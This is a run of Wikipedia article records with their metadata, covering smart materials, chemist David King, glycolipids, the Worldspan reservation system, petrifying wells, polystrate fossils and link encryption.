Smart materials, also called intelligent or responsive materials, are designed materials that have one or more properties that can be significantly changed in a controlled fashion by external stimuli, such as stress, moisture, electric or magnetic fields, light, temperature, pH, or chemical compounds. Smart materials are the basis of many applications, including sensors and actuators, or artificial muscles, particularly as electroactive polymers (EAPs). Types There are a number of types of smart material, of which are already common. Some examples are as following: Piezoelectric materials are materials that produce a voltage when stress is applied. Since this effect also applies in a reverse manner, a voltage across the sample will produce stress within sample. Suitably designed structures made from these materials can, therefore, be made that bend, expand or contract when a voltage is applied. Shape-memory alloys and shape-memory polymers are materials in which large deformation can be induced and recovered through temperature changes or stress changes (pseudoelasticity). The shape memory effect results due to respectively martensitic phase change and induced elasticity at higher temperatures. Photovoltaic materials or optoelectronics convert light to electrical current. Electroactive polymers (EAPs) change their volume by voltage or electric fields. Magnetostrictive materials exhibit a change in shape under the influence of magnetic field and also exhibit a change in their magnetization under the influence of mechanical stress. Magnetic shape memory alloys are materials that change their shape in response to a significant change in the magnetic field. Smart inorganic polymers showing tunable and responsive properties. pH-sensitive polymers are materials that change in volume when the pH of the surrounding medium changes. Temperature-responsive polymers are materials which undergo changes upon temperature. Halochromic materials are commonly used materials that change their color as a result of changing acidity. One suggested application is for paints that can change color to indicate corrosion in the metal underneath them. Chromogenic systems change color in response to electrical, optical or thermal changes. These include electrochromic materials, which change their colour or opacity on the application of a voltage (e.g., liquid crystal displays), thermochromic materials change in colour depending on their temperature, and photochromic materials, which change colour in response to light—for example, light-sensitive sunglasses that darken when exposed to bright sunlight. Ferrofluids are magnetic fluids (affected by magnets and magnetic fields). Photomechanical materials change shape under exposure to light. Polycaprolactone (polymorph) can be molded by immersion in hot water. Self-healing materials have the intrinsic ability to repair damage due to normal usage, thus expanding the material's lifetime. Dielectric elastomers (DEs) are smart material systems which produce large strains (up to 500%) under the influence of an external electric field. Magnetocaloric materials are compounds that undergo a reversible change in temperature upon exposure to a changing magnetic field. Thermoelectric materials are used to build devices that convert temperature differences into electricity and vice versa. Chemoresponsive materials change size or volume under the influence of external chemical or biological compound. See also Smart polymer Programmable matter Sensors Actuators Artificial muscles Thermally induced shape-memory effect (polymers) Covalent adaptable networks / Vitrimers References External links Smart Materials Book Series, Royal Society of Chemistry Artificial materials
Smart material
[ "Physics", "Materials_science", "Engineering" ]
705
[ "Materials science", "Artificial materials", "Materials", "Smart materials", "Matter" ]
1,065,128
https://en.wikipedia.org/wiki/David%20King%20%28chemist%29
Sir David Anthony King (born 12 August 1939) is a South African-born British chemist, academic, and head of the Climate Crisis Advisory Group (CCAG). King first taught at Imperial College, London, the University of East Anglia, and was then Brunner Professor of Physical Chemistry (1974–1988) at the University of Liverpool. He held the 1920 Chair of Physical Chemistry at the University of Cambridge from 1988 to 2006, and was Master of Downing College, Cambridge, from 1995 to 2000: he is now emeritus professor. While at Cambridge, he was successively a fellow of St John's College, Downing College, and Queens' College. Moving to the University of Oxford, he was Director of the Smith School of Enterprise and the Environment from 2008 to 2012, and a Fellow of University College, Oxford, from 2009 to 2012. He was additionally President of Collegio Carlo Alberto in Turin, Italy (2008–2011), and Chancellor of the University of Liverpool (2010–2013). Outside of academia, King was Chief Scientific Adviser to the UK Government and Head of the Government Office for Science from 2000 to 2007. He was then senior scientific adviser to UBS, a Swiss investment bank and financial services company, from 2008 to 2013. From 2013 to 2017, he returned to working with the UK Government as Special Representative for Climate Change to the Foreign Secretary. He was also Chairman of the government's Future Cities Catapult from 2013 to 2016. Early life and education King was born on 12 August 1939 in South Africa, son of Arnold Tom Wallis King, of Johannesburg, director of a paint company, and Patricia Mary Bede, née Vardy. His elder brother, Michael Wallis King (born 1937), was director of the FirstRand bank and vice-chair of the multinational mining company Anglo American plc. King was educated at St John's College, an all-boys private school in Johannesburg. He studied at University of the Witwatersrand, graduating with a Bachelor of Science (BSc) degree and then a Doctor of Philosophy (PhD) degree in 1963. Academic career After his PhD, King moved to the United Kingdom where he was a Shell Scholar at Imperial College, London, from 1963 to 1966. He was then a lecturer in the School of Chemical Sciences of the University of East Anglia from 1966 to 1974. He was appointed Brunner Professor of Physical Chemistry at the University of Liverpool in 1974. He was a member of the National Executive of the Association of University Teachers from 1970 until 1978, and served as its president for the 1976/77 academic year. In 1988, King was appointed 1920 Professor of Physical Chemistry at the University of Cambridge. He subsequently served as Head of the University's Department of Chemistry from 1993 to 2000, and was its director of research from 2005 to 2011. When he first moved to Cambridge in 1988, he was elected a Fellow of St John's College, Cambridge. He moved from St John's when he was elected Master of Downing College, Cambridge, in 1995. He stepped down as Master in 2000, and was then a Fellow of Queens' College, Cambridge, from 2001 to 2008. From 2008 to 2012, King was Director of the Smith School of Enterprise and the Environment at the University of Oxford. He was also a Fellow of University College, Oxford, from 2009 to 2012. He was President of Collegio Carlo Alberto in Turin, Italy, from 2008 to 2011, and was Chancellor of the University of Liverpool from 2010 to 2013. Research King has published over 500 papers on his research in chemical physics and on science and policy. During his time at Cambridge, King had, together with Gabor Somorjai and Gerhard Ertl, shaped the discipline of surface science and helped to explain the underlying principles of heterogeneous catalysis. However, the 2007 Nobel Prize in Chemistry was awarded to Ertl alone. Career outside academia King was the Chief Scientific Adviser to the UK Government and Head of the Government Office for Science from October 2000 to 31 December 2007, under prime ministers Tony Blair and Gordon Brown. In that time, he raised the profile of the need for governments to act on climate change and was instrumental in creating the £1 billion Energy Technologies Institute. In 2008 he co-authored The Hot Topic on this subject. During his tenure as Chief Scientific Adviser, he raised public awareness for climate change and initiated several foresight studies. As director of the government's Foresight Programme, he created an in-depth horizon scanning process which advised government on a wide range of long-term issues, from flooding to obesity. He also chaired the government's Global Science and Innovation Forum from its inception. King advised the government on issues including: the foot-and-mouth disease epidemic 2001; post 9/11 risks to the UK; GM foods; energy provision; and innovation and wealth creation. He was heavily involved in the government's Science and Innovation Strategy 2004–2014. He suggested that scientists should honour a Hippocratic Oath for Scientists. In April 2008, King joined UBS, a Swiss investment bank, as senior science advisor. He left UBS to return to the UK government when he was appointed the Foreign Secretary's Special Representative for Climate Change in September 2013. From 2013 to 2016, King was the first chairman of the Future Cities Catapult, a government-funded body conducting research into smart cities. In May 2020, in response to the COVID-19 pandemic, King formed and led Independent SAGE, a committee of unpaid experts which acts as a "shadow" of the UK government's SAGE group to address concerns of lack of transparency and political influence on that body. Views Climate change In his role as scientific advisor to the UK government King was outspoken on the subject of climate change, saying "I see climate change as the greatest challenges facing Britain and the World in the 21st century" and "climate change is the most severe problem we are facing today – more serious even than the threat of terrorism". He strongly supports the work of the IPCC, saying in 2004 that the 2001 synthesis report "is the best current statement on the state of play of the science of climate change, and that really does represent 1,000 scientists". King criticised the Bush administration for what he saw as its failures in climate change policy, saying it is "failing to take up the challenge of global warming". In 2004, King gave evidence to a House of Commons select committee confirming his view that "on a global and geological scale that climate change is the most serious problem we are faced with this century", and illustrated it with a statement that "Fifty-five million years ago was a time when there was no ice on the earth; the Antarctic was the most habitable place for mammals". The Independent on Sunday reported that King had at a later event compared current and projected carbon dioxide levels with the record over the past 60 million years, and in an indirect quote suggested King implied that Antarctica was likely to be the world's "only" habitable continent by the end of this century if global warming remains unchecked. At the end of the 2007 programme "The Great Global Warming Swindle", broadcast on Channel 4, Fred Singer ridiculed the reported view of the "chief scientist"; King's complaint to Ofcom that the programme was unfair and had not given a chance to clarify was upheld, despite Channel 4's arguments that King was not named and had not challenged earlier reporting. King became head of the Climate Crisis Advisory Group in 2021, basing public meetings on a similar format to Independent SAGE, and publishing reports advising emission cuts and carbon dioxide removal. He promotes the CCAG's 4R planet pathway: Reducing emissions; Removing the excess greenhouse gases (GHGs) already in the atmosphere; Repairing ecosystems; strengthening local and global Resilience against inevitable climate impacts. Food production King told The Independent newspaper in February 2007 "he agreed that organic food was no safer than chemically-treated food" and openly supported a study by the Manchester Business School that implicated organic farming practices in unfavourable CO2 comparisons with conventional chemical farming. In an article published in The Guardian in February 2009, King is quoted as saying that "future historians might look back on our particular recent past and see the Iraq war as the first of the conflicts of this kind – the first of the resource wars" and that this was "certainly the view" (that the invasion was motivated by a desire to secure energy supplies) he held at the time of the invasion, along with "quite a few people in government". Energy King is a strong supporter of nuclear electricity generation, arguing that it is a safe, technically feasible solution that can help to reduce emissions from the utilities sector now, while the development of alternative low-carbon solutions is incentivised. In the transport sector, King has warned governments that conventional oil resources are more scarce than they believe and that peak oil might approach sooner than expected. Moreover, he has criticised first generation biofuels due to the effect on food prices and subsequent effect on the developing world. He strongly supports second generation biofuels, however, which are manufactured from inedible biomass such as corn stover, wood chips or straw. These biofuels are not made from food sources (see food vs fuel). King is a member of the Global Apollo Programme and headed its public launch in 2015. The programme calls for multinational research into reducing the cost of low-carbon electricity generation. Humanism King is a Distinguished Supporter of Humanists UK. Covid response In July 2020 King advocated for school closures in the UK until covid cases were reduced to 1 in a million. Honours and awards King was knighted in the 2003 New Year honours. In 2009, he was made a Chevalier of the Légion d'Honneur by the French government. In 1991 he received the BVC Medal and Prize, awarded by the British Vacuum Council. He was elected a Fellow of the Royal Society (FRS) in 1991, a Foreign Fellow of the American Academy of Arts and Sciences in 2002, and an Honorary Fellow of the Royal Academy of Engineering (HonFREng) in 2006. In media King appears in the film The Age of Stupid, released in February 2009, talking about Hurricane Katrina. He was portrayed by David Calder in the 2021 BBC television film The Trick. Personal life By his first marriage, which ended in divorce, King has two sons. In 1983, he married, secondly, charity administrator and former head of a commercial law team, Jane Margaret, daughter of general practitioner Hans Eugen Lichtenstein, OBE, of Llandrindod Wells, Powys, Wales, a Holocaust survivor from a family that owned leather goods shops and an umbrella factory in Berlin. They have a son and a daughter. Books published Sir David King, Gabrielle Walker, The Hot Topic: how to tackle global warming and still keep the lights on, Bloomsbury London 2008 Oliver Inderwildi, Sir David King, Energy, Transport & the Environment, 2012, Springer London New York Heidelberg References Biographical links David King interviewed by Alan Macfarlane 27 November 2009 (video) Sir David King at the Smith School of Enterprise and the Environment, University of Oxford Sir David King at the Department of Chemistry, University of Cambridge BBC's biography of Sir David King David King's article on climate change at www.chinadialogue.net 'Profile: Professor Sir David King' by Alison Benjamin, The Guardian, 27 November 2007. Sir David King: Building a Sustainable Future Lecture presented at the Royal Institute of British Architecture 2007 (Video) British physical chemists Fellows of the Royal Society Masters of Downing College, Cambridge Members of the University of Cambridge Department of Chemistry 1939 births Living people Knights Bachelor Knights of the Legion of Honour Academics of the University of East Anglia Chief Scientific Advisers to HM Government Place of birth missing (living people) Presidents of the British Science Association Fellows of Queens' College, Cambridge Global Apollo Programme Academics of the University of Liverpool University of the Witwatersrand alumni Fellows of the American Academy of Arts and Sciences Fellows of St John's College, Cambridge Fellows of University College, Oxford Honorary Fellows of the Royal Academy of Engineering Academics of Imperial College London Chancellors of the University of Liverpool Professors of Physical Chemistry (Cambridge)
David King (chemist)
[ "Chemistry" ]
2,492
[ "Professors of Physical Chemistry (Cambridge)", "Physical chemists" ]
1,065,208
https://en.wikipedia.org/wiki/Glycolipid
Glycolipids are lipids with a carbohydrate attached by a glycosidic (covalent) bond. Their role is to maintain the stability of the cell membrane and to facilitate cellular recognition, which is crucial to the immune response and in the connections that allow cells to connect to one another to form tissues. Glycolipids are found on the surface of all eukaryotic cell membranes, where they extend from the phospholipid bilayer into the extracellular environment. Structure The essential feature of a glycolipid is the presence of a monosaccharide or oligosaccharide bound to a lipid moiety. The most common lipids in cellular membranes are glycerolipids and sphingolipids, which have glycerol or a sphingosine backbones, respectively. Fatty acids are connected to this backbone, so that the lipid as a whole has a polar head and a non-polar tail. The lipid bilayer of the cell membrane consists of two layers of lipids, with the inner and outer surfaces of the membrane made up of the polar head groups, and the inner part of the membrane made up of the non-polar fatty acid tails. The saccharides that are attached to the polar head groups on the outside of the cell are the ligand components of glycolipids, and are likewise polar, allowing them to be soluble in the aqueous environment surrounding the cell. The lipid and the saccharide form a glycoconjugate through a glycosidic bond, which is a covalent bond. The anomeric carbon of the sugar binds to a free hydroxyl group on the lipid backbone. The structure of these saccharides varies depending on the structure of the molecules to which they bind. Metabolism Glycosyltransferases Enzymes called glycosyltransferases link the saccharide to the lipid molecule, and also play a role in assembling the correct oligosaccharide so that the right receptor can be activated on the cell which responds to the presence of the glycolipid on the surface of the cell. The glycolipid is assembled in the Golgi apparatus and embedded in the surface of a vesicle which is then transported to the cell membrane. The vesicle merges with the cell membrane so that the glycolipid can be presented on the cell's outside surface. Glycoside hydrolases Glycoside hydrolases catalyze the breakage of glycosidic bonds. They are used to modify the oligosaccharide structure of the glycan after it has been added onto the lipid. They can also remove glycans from glycolipids to turn them back into unmodified lipids. Defects in metabolism Sphingolipidoses are a group of diseases that are associated with the accumulation of sphingolipids which have not been degraded correctly, normally due to a defect in a glycoside hydrolase enzyme. Sphingolipidoses are typically inherited, and their effects depend on which enzyme is affected, and the degree of impairment. One notable example is Niemann–Pick disease which can cause pain and damage to neural networks. Function Cell–cell interactions The main function of glycolipids in the body is to serve as recognition sites for cell–cell interactions. The saccharide of the glycolipid will bind to a specific complementary carbohydrate or to a lectin (carbohydrate-binding protein), of a neighboring cell. The interaction of these cell surface markers is the basis of cell recognitions, and initiates cellular responses that contribute to activities such as regulation, growth, and apoptosis. Immune responses An example of how glycolipids function within the body is the interaction between leukocytes and endothelial cells during inflammation. Selectins, a class of lectins found on the surface of leukocytes and endothelial cells bind to the carbohydrates attached to glycolipids to initiate the immune response. This binding causes leukocytes to leave circulation and congregate near the site of inflammation. This is the initial binding mechanism, which is followed by the expression of integrins which form stronger bonds and allow leukocytes to migrate toward the site of inflammation. Glycolipids are also responsible for other responses, notably the recognition of host cells by viruses. Blood types Blood types are an example of how glycolipids on cell membranes mediate cell interactions with the surrounding environment. The four main human blood types (A, B, AB, O) are determined by the oligosaccharide attached to a specific glycolipid on the surface of red blood cells, which acts as an antigen. The unmodified antigen, called the H antigen, is the characteristic of type O, and is present on red blood cells of all blood types. Blood type A has an N-acetylgalactosamine added as the main determining structure, type B has a galactose, and type AB has all three of these antigens. Antigens which are not present in an individual's blood will cause antibodies to be produced, which will bind to the foreign glycolipids. For this reason, people with blood type AB can receive transfusions from all blood types (the universal acceptor), and people with blood type O can act as donors to all blood types (the universal donor). Types of glycolipids Glycoglycerolipids: a sub-group of glycolipids characterized by an acetylated or non-acetylated glycerol with at least one fatty acid as the lipid complex. Glyceroglycolipids are often associated with photosynthetic membranes and their functions. The subcategories of glyceroglycolipids depend on the carbohydrate attached. Galactolipids: defined by a galactose sugar attached to a glycerol lipid molecule. They are found in chloroplast membranes and are associated with photosynthetic properties. Sulfolipids: have a sulfur-containing functional group in the sugar moiety attached to a lipid. An important group is the sulfoquinovosyl diacylglycerols which are associated with the sulfur cycle in plants. Glycosphingolipids: a sub-group of glycolipids based on sphingolipids. Glycosphingolipids are mostly located in nervous tissue and are responsible for cell signaling. Cerebrosides: a group glycosphingolipids involved in nerve cell membranes. Galactocerebrosides: a type of cerebroseide with galactose as the saccharide moiety Glucocerebrosides: a type of cerebroside with glucose as the saccharide moiety; often found in non-neural tissue. Sulfatides: a class of glycolipids containing a sulfate group in the carbohydrate with a ceramide lipid backbone. They are involved in numerous biological functions ranging from immune response to nervous system signaling. Gangliosides: the most complex animal glycolipids. They contain negatively charged oligosacchrides with one or more sialic acid residues; more than 200 different gangliosides have been identified. They are most abundant in nerve cells. Globosides: glycosphingolipids with more than one sugar as part of the carbohydrate complex. They have a variety of functions; failure to degrade these molecules leads to Fabry disease. Glycophosphosphingolipids: complex glycophospholipids from fungi, yeasts, and plants, where they were originally called "phytoglycolipids". They may be as complicated a set of compounds as the negatively charged gangliosides in animals. Glycophosphatidylinositols: a sub-group of glycolipids defined by a phosphatidylinositol lipid moiety bound to a carbohydrate complex. They can be bound to the C-terminus of a protein and have various functions associated with the different proteins they can be bound to. See also Sophorolipid Rhamnolipid Glycocalyx Glycome Glycoprotein Niemann–Pick disease References External links Carbohydrate chemistry
Glycolipid
[ "Chemistry" ]
1,824
[ "Carbohydrates", "Glycolipids", "Carbohydrate chemistry", "Chemical synthesis", "nan", "Glycobiology" ]
1,065,209
https://en.wikipedia.org/wiki/Worldspan
Worldspan is a provider of travel technology and content and a part of the Travelport GDS business. It offers worldwide electronic distribution of travel information, Internet products and connectivity, and e-commerce capabilities for travel agencies, travel service providers and corporations. Its primary system is commonly known as a Global Distribution System (GDS), which is used by travel agents and travel related websites to book airline tickets, hotel rooms, rental cars, tour packages and associated products. Worldspan also hosts IT services and product solutions for major airlines. Recent events In December, 2006, Travelport, owner of the Galileo GDS, Gullivers Travel Associates (GTA) and a controlling share in Orbitz, agreed to acquire Worldspan. However, at the time, management of Travelport did not commit to the eventual merging of the two GDS systems, saying that they were considering all options, including running both systems in parallel. On August 21, 2007, the acquisition was completed for $1.4 billion and Worldspan became a part of Travelport GDS, which also includes Galileo and other related businesses. On September 28, 2008, the Galileo and Apollo GDS were moved from the Travelport datacenter in Denver, Colorado to the Worldspan datacenter in Atlanta, Georgia (although they continue to be run as separate systems from the Worldspan GDS). In 2012, Worldspan customers were migrated from the TPF-based FareSource pricing engine to Travelport's Linux-based 360 Fares pricing engine already used by Galileo and Apollo. Although the three systems share a common pricing platform, they continue to operate as separate GDS. History Worldspan was formed in early 1990 by Delta Air Lines, Northwest Airlines, and TWA to operate and sell its GDS services to travel agencies worldwide. Worldspan operated very effectively and profitably, successfully expanding its business in markets throughout North America, South America, Europe, and Asia. As a result, in mid-2003, Worldspan was sold by its owner airlines to Citigroup Venture Capital and Ontario Teachers' Pension Fund which in turn sold the business to Travelport in 2007. Worldspan was formed in 1990 by combining the PARS partnerships companies (owned by TWA and Northwest Airlines, Inc.) and DATAS II, a division of Delta Air Lines, Inc. One of Worldspan’s predecessors – TWA PARS – became the first GDS to be installed in travel agencies in 1976. ABACUS, an Asian company owned by a number of Asian airlines, owned a small portion of Worldspan, and Worldspan owned a small portion of Abacus. Worldspan and Abacus entered into a series of business and technology relationships. These relationships were terminated after Abacus engaged in fraudulent and deceptive practices, for which Worldspan received a sizable judgement in an arbitration in London. See also Amadeus IT Group List of global distribution systems Passenger Name Record Code sharing Travel technology References Airline tickets Travel technology Computer reservation systems
Worldspan
[ "Technology" ]
603
[ "Computer reservation systems", "Computer systems" ]
1,065,218
https://en.wikipedia.org/wiki/Petrifying%20well
A petrifying well is a well or other body of water which gives objects a stone-like appearance. If an object is placed into such a well and left there for a period of months or years, the object acquires a stony exterior. Nature If an object is placed into such a well and left there for a period of weeks or months the object acquires a stony exterior. At one time this property was believed to be a result of magic or witchcraft, but it is an entirely natural phenomenon and due to a process of evaporation and deposition in waters with an unusually high mineral content. This process of petrifying is not to be confused with petrification, wherein the constituent molecules of the original object are replaced (and not merely overlaid) with molecules of stone or mineral. Examples Notable examples of petrifying wells in England are the spring at Mother Shipton's Cave in Knaresborough and Matlock Bath, in Derbyshire. In Ireland, such wells were noted by John Rutty on Howth Head, among other locations. See also Speleothem Stalactite Stalagmite References External links Mother Shipton's Cave & the Petrifying Well Water wells Witchcraft in England English folklore
Petrifying well
[ "Chemistry", "Engineering", "Environmental_science" ]
251
[ "Hydrology", "Water wells", "Environmental engineering" ]
1,065,272
https://en.wikipedia.org/wiki/Polystrate%20fossil
A polystrate fossil is a fossil of a single organism (such as a tree trunk) that extends through more than one geological stratum. The word polystrate is not a standard geological term. This term is typically found in creationist publications. This term is typically applied to "fossil forests" of upright fossil tree trunks and stumps that have been found worldwide, i.e. in the Eastern United States, Eastern Canada, England, France, Germany, and Australia, typically associated with coal-bearing strata. Within Carboniferous coal-bearing strata, it is also very common to find what are called Stigmaria (root stocks) within the same stratum. Stigmaria are completely absent in post-Carboniferous strata, which contain either coal, polystrate trees, or both. Geological explanation In geology, such fossils are referred to as either upright fossil trunks, upright fossil trees, or T0 assemblages. According to mainstream models of sedimentary environments, they are formed by rare to infrequent brief episodes of rapid sedimentation separated by long periods of either slow deposition, nondeposition, or a combination of both. Upright fossils typically occur in layers associated with an actively subsiding coastal plain or rift basin, or with the accumulation of volcanic material around a periodically erupting stratovolcano. Typically, this period of rapid sedimentation was followed by a period of time - decades to thousands of years long - characterized by very slow or no accumulation of sediments. In river deltas and other coastal-plain settings, rapid sedimentation is often the end result of a brief period of accelerated subsidence of an area of coastal plain relative to sea level caused by salt tectonics, global sea-level rise, growth faulting, continental margin collapse, or some combination of these factors. For example, geologists such as John W. F. Waldron and Michael C. Rygel have argued that the rapid burial and preservation of polystrate fossil trees found at Joggins, Nova Scotia directly result from rapid subsidence, caused by salt tectonics within an already subsiding pull-apart basin, and from the resulting rapid accumulation of sediments. The specific layers containing polystrate fossils occupy only a very limited fraction of the total area of any of these basins. Yellowstone The upright fossil trees of the Gallatin Petrified Forest in the Gallatin Range and the Yellowstone Petrified Forest at Amethyst Mountain and Specimen Ridge in Yellowstone National Park, occur buried within the lahars and other volcanic deposits comprising the Eocene Lamar River Formation as the result of periods of rapid sedimentation associated with explosive volcanism. This type of volcanism generates and deposits large quantities of loose volcanic material as a blanket over the slope of a volcano, as happened during the 1991 eruption of Mount Pinatubo. Both during and for years after a period of volcanism, lahars and normal stream activity wash this loose volcanic material downslope. These processes result in the rapid burial of large areas of the surrounding countryside beneath several meters of sediment, as directly observed during the 1991 eruption of Mount Pinatubo. As with modern lahar deposits, the sedimentary layers containing upright trees of the Yellowstone petrified forest are discontinuous and very limited in areal extent. Individual layers containing upright trees and individual buried forests occupy only a very small fraction of the total area of Yellowstone National Park. Fossil soils Geologists have recognized innumerable fossil soils (paleosols) throughout the strata containing upright fossils at Joggins in Nova Scotia, in the Yellowstone petrified forests, in the coal mines of the Black Warrior Basin of Alabama, and at many other locations. The layer immediately underlying coal seams, often called either "seatearth" or "underclay", typically either consists of or contains a paleosol. Paleosols are soils which were formed by subaerial weathering during periods of very slow or no accumulation of sediments. Later, renewed sedimentation buried these soils to create paleosols. These paleosols are identified on the basis of the presence of structures and microstructures unique to soils; animal burrows and molds of plant roots of various sizes and types; recognizable soil-profile development; and alteration of minerals by soil processes. In many cases, these paleosols are virtually identical to modern soils. Geologists, who have studied upright fossils found in sedimentary rocks exposed in various outcrops for decades, have described the upright fossil trees as being deeply rooted in place and typically rooted in recognizable paleosols. Researchers such as Falcon and Rygel et al., have published detailed field-sketches and pictures of upright tree-fossils with intact root systems, which are rooted within recognizable paleosols. In the case of the upright fossil trees of the Yellowstone petrified forests, it has been found that the upright fossil trees, except for relatively short stumps, are rooted in place within the underlying sediments. Typically, the sediments within which trees are rooted have paleosols developed within them. Retallack (1981, 1997) has published pictures and diagrams of the Yellowstone upright fossil trees having intact root systems developed within paleosols found within these strata. Formation by regeneration Geologists have also found that some of the larger upright fossil trees found within Carboniferous coal-bearing strata show evidence of regeneration after being partially buried by sediments. In these cases, the trees were clearly alive when they were partially buried by sediments. The accumulated sediment was insufficient to kill the trees immediately because of their size. As a result, some of them developed a new set of roots from their trunks just below the new ground surface. Until they either died or were overwhelmed by the accumulating sediments, these trees would likely continue to regenerate by adding height and new roots with each increment of sediment, eventually leaving several meters of former "trunk" buried underground as sediments accumulated. Formation by Carboniferous deglacial meltwater-pulses In addition, part of the Carboniferous Period was a period of extensive and thick continental ice sheets. During the Carboniferous ice age, the repeated glacial – interglacial cycles caused major changes in the thickness and extent of continental ice sheets. When these ice sheets expanded in extent and thickness, eustatic sea level typically fell by over a . When these ice sheets shrank in extent and thickness, eustatic sea level typically rose again by typically over a . As occurred during the Holocene Epoch for Meltwater pulse 1A and Meltwater pulse 1B, brief episodes of rapid melting of Carboniferous, Gondwanan continental ice sheets likely caused very rapid rises in sea level that would have abruptly inundated low-lying coastal swamps and drowned the forests growing on them. Based on the sedimentology of roof strata of surface and underground coal mines and cyclothems containing the fossils of upright and in situ tree trunks, geologists proposed that the flooding of coastal swamp by deglacial meltwater pulses resulted in the rapid flooding of coastal forests, particularly along preexisting coastal rivers and streams, over large areas of coastal swamp. During and after their submergence, upright trunks of drowned coastal forests were buried by tidally influenced sedimentation. Association with marine fossils Geologists find nothing anomalous about upright fossil trees found in Carboniferous coal-bearing strata being associated with marine or brackish-water fossils. Because they lived on subsiding coastal plains or pull-apart basins open to the coast, it was quite frequent for subsidence to periodically outpace the accumulation of sediments such that adjacent shallow marine waters would periodically inundate coastal plains in which the trees were buried. As a result, sediments containing marine fossils would periodically accumulate within these areas before being replaced by coastal swamps - either as sediments filled in the shallow sea or as the sea level fell. Also, according to ecological reconstructions by geologists, specific assemblages of the types of trees found as upright fossils occupied brackish water, even saline coastal swamps much like modern mangrove swamps. Thus, finding marine and brackish water fossils associated with these trees is no different than finding brackish water or marine animals living in modern mangrove swamps. A detailed study by Taylor and Vinn (2006) of the microstructure of fossils which have been traditionally identified as "Spirorbis" in the geological literature revealed that they consist of the remains of at least two completely different animals. Taylor and Vinn discovered that the "Spirorbis" fossils found in sedimentary strata, including the Joggins and other Carboniferous coal measures deposited from the Ordovician to Triassic periods are the remains of an extinct order of lophophorates (now called microconchids) unrelated to modern marine tube-worms (Annelids) to which the genus Spirorbis belongs. This contradicts arguments made by Harold Coffin and other creationists that "Spirorbis" fossils within strata containing polystrate fossils indicate their deposition in a marine environment, because these fossils are classified as the remains of extinct fresh and brackish water microconchids instead of the remains of the marine genera Spirorbis as they have been misidentified in the geologic literature. Quaternary examples Scientists interpret polystrate fossils as fossils buried in a geologically short time span - either by one large depositional event or by several smaller ones. Geologists see no need to invoke a global flood to explain upright fossils. This position of geologists is supported by numerous documented examples, a few of which are discussed in the paragraphs below, of buried upright tree-trunks that have been observed buried in the Holocene volcanic deposits of Mount St. Helens, Skamania County, Washington, and Mount Pinatubo, Philippines; in the deltaic and fluvial sediments of the Mississippi River Delta; and in glacial deposits within the midwestern United States. These buried upright trees demonstrate that conventional geologic processes are capable of burying and preserving trees in an upright position such that in time, they will become fossilized. Volcanic deposits At this time, the best documented occurrences of unfossilized buried upright trees occur within the historic and late-Holocene volcanic deposits of Mount St. Helens (Skamania County, Washington) and of Mount Pinatubo in the Philippines. At Mount St. Helens, both unfossilized and partially fossilized trees have occurred in many outcrops of volcanic debris and mud flows (lahars) and pyroclastic flow deposits, which date from 1885 to over 30,000 BP., along the South Toutle and other rivers. Late Holocene forests of upright trees also occur within the volcanic deposits of other Cascade Range volcanoes. In the space of a few years after the eruption of Mount Pinatubo in 1991, the erosion of loose pyroclastic deposits covering the slopes of the mountain generated a series of volcanic lahars, which ultimately buried large parts of the countryside along major streams draining these slopes beneath several meters of volcanic sediments. The repeated deposition of sediments by volcanic lahars and by sediment-filled rivers not only created innumerable polystrate trees, but also "polystrate" telephone-poles, churches, and houses, over a period a few years. The volcanic deposits enclosing modern upright trees are often virtually identical in their sedimentary structures, external and internal layering, texture, buried soils, and other general character to the volcanic deposits containing the Yellowstone buried forests. As in case of modern forests buried by lahars, the individual buried forests of the Yellowstone Petrified Forest and the layers containing them are very limited in their areal extent. Deltaic deposits Within excavations for Interstate Highway 10 in the United States of America, and in borrow pits, in landfills, and archaeological surveys, unfossilized upright trees have been found buried within late Holocene, even historic, fluvial and deltaic sediments underlying the surface of the Mississippi River Delta and the Atchafalaya Basin of Louisiana. In one case, borrow pits dug in the natural levees of Bayou Teche near Patterson, Louisiana, have exposed completely buried, 4 to 6 feet (1.2 to 1.8 meters) high, upright trunks of cypress trees. Northeast of Donaldsonville, Louisiana, a borrow pit excavated for fill used to maintain nearby artificial levees, exposed three levels of rooted upright tree trunks stacked on top of each other lying completely buried beneath the surface of Point Houmas, a patch of floodplain lying within a meander loop of the current course of the Mississippi River. While searching for buried archaeological sites, archaeologists excavated a 12 ft (3.6 meter) high upright rooted cypress tree completely buried within a natural levee of the Atchafalaya River within the Indian Bayou Wildlife Management Area just south of Krotz Springs, Louisiana. Radiocarbon dates and historic documents collected for this archaeological survey, during which this and other upright trees were found, of the Indian Bayou Wildlife Management Area demonstrated that these upright trees were buried in the 1800s, during the initial diversion of Mississippi River's flow into the Atchafalaya River. Glacial deposits Unfossilized, late Pleistocene upright trees have been found buried beneath glacial deposits within North America along the southern edge of the Laurentide Ice Sheet. These buried forests were created when the southern edge of the Laurentide Ice Sheet locally dammed valleys. As a result, meltwater lakes filled these valleys and submerged forests within them. Sediments released by the melting of the adjacent ice sheet rapidly filled these lakes, which quickly buried and preserved the submerged forests lying within them. One forest of in situ, 24,000-year-old unfossilized upright trees was exposed by excavations for a quarry near Charleston, Illinois. Excavations for a tailings pond about Marquette, Michigan, exposed an in situ forest of unfossilized trees, which are about 10,000 years old, buried in glacial lake and stream sediments. References External links Ferguson, L., 1988, Formation of Joggin upright fossil trees, The Joggins Fossil Cliffs, Fossils of Nova Scotia, Nova Scotia Museum, Nova Scotia. Macrea, A. 1997, "Polystrate" Tree Fossils, TalkOrigins Archive Stratigraphy Fossils Creationism
Polystrate fossil
[ "Biology" ]
2,914
[ "Creationism", "Biology theories", "Obsolete biology theories" ]
1,065,304
https://en.wikipedia.org/wiki/Link%20encryption
Link encryption is an approach to communications security that encrypts and decrypts all network traffic at each network routing point (e.g. network switch, or node through which it passes) until arrival at its final destination. This repeated decryption and encryption is necessary to allow the routing information contained in each transmission to be read and employed further to direct the transmission toward its destination, before which it is re-encrypted. This contrasts with end-to-end encryption where internal information, but not the header/routing information, is encrypted by the sender at the point of origin and only decrypted by the intended recipient. Link encryption offers two main advantages: encryption is automatic so there is less opportunity for human error. if the communications link operates continuously and carries an unvarying level of traffic, link encryption defeats traffic analysis. On the other hand, end-to-end encryption ensures only the intended recipient has access to the plaintext. Link encryption can be used with end-to-end systems by superencrypting the messages. Bulk encryption refers to encrypting a large number of circuits at once, after they have been multiplexed. References Cryptography
Link encryption
[ "Mathematics", "Engineering" ]
249
[ "Applied mathematics", "Cryptography", "Cybersecurity engineering" ]
1,065,315
https://en.wikipedia.org/wiki/Generic%20access%20profile
